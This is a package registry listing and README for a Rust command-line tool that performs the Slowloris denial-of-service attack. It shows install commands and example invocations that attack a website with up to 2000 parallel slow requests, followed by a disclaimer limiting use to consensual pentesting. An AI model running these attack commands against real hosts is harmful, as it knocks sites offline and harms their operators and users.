Crates.io | slowloris |
lib.rs | slowloris |
version | 1.2.1 |
source | src |
created_at | 2017-10-31 23:03:14.886698 |
updated_at | 2022-05-09 14:38:07.212579 |
description | The slow loris attack, now implemented in Rust! |
homepage | |
repository | https://github.com/SirRade/slowloris-rs |
max_upload_size | |
id | 37617 |
size | 31,003 |
The slow loris attack, now implemented in Rust!
Installation:
$ cargo install slowloris
Attacking a host:
$ slowloris https://some_random_website.com
Updating the slowloris command:
$ cargo install --force slowloris
Specifying the time between attacks and the number of parallel requests:
$ slowloris https://some_random_website.com --timeout 15 --requests 2000
This tool is meant for consensual pentesting. Do not use it to attack hosts without their explicit permission.